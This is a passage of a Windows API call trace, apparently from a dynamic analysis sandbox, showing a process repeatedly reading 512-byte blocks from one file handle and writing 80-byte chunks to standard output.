lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, 
lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.910] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.910] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] GetFileType (hFile=0x50) returned 0x1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] GetFileType (hFile=0x50) returned 0x1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] GetFileType (hFile=0x50) returned 0x1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] GetFileType (hFile=0x50) returned 0x1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] WriteFile (in: hFile=0x50, 
lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] GetFileType (hFile=0x50) returned 0x1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] GetFileType (hFile=0x50) returned 0x1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] GetFileType (hFile=0x50) returned 0x1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] GetFileType (hFile=0x50) returned 0x1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.911] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.911] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0205.911] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] GetFileType (hFile=0x50) returned 0x1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] GetFileType (hFile=0x50) returned 0x1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] 
GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.913] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.913] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.913] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.913] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] GetFileType (hFile=0x50) returned 0x1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] GetFileType (hFile=0x50) returned 0x1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | 
out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] GetFileType (hFile=0x50) returned 0x1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] GetFileType (hFile=0x50) returned 0x1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.914] GetFileType (hFile=0x50) returned 0x1 [0205.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.914] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.914] GetFileType (hFile=0x50) returned 0x1 [0205.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.914] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] GetFileType (hFile=0x50) returned 0x1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, 
lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] GetFileType (hFile=0x50) returned 0x1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.915] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.915] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] GetFileType (hFile=0x50) returned 0x1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] GetFileType (hFile=0x50) returned 0x1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] GetFileType (hFile=0x50) returned 0x1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] GetFileType (hFile=0x50) returned 0x1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 
[0205.916] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] GetFileType (hFile=0x50) returned 0x1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] GetFileType (hFile=0x50) returned 0x1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] GetFileType (hFile=0x50) returned 0x1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] GetFileType (hFile=0x50) returned 0x1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.916] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) 
returned 1 [0205.917] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.917] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.917] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] GetFileType (hFile=0x50) returned 0x1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] GetFileType (hFile=0x50) returned 0x1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.918] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.918] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] GetFileType (hFile=0x50) returned 0x1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] GetFileType (hFile=0x50) returned 0x1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] GetFileType (hFile=0x50) returned 0x1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] GetFileType (hFile=0x50) returned 0x1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] GetFileType (hFile=0x50) returned 0x1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] GetFileType (hFile=0x50) returned 0x1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] GetFileType (hFile=0x50) returned 0x1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, 
lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] GetFileType (hFile=0x50) returned 0x1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.920] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.920] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.920] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 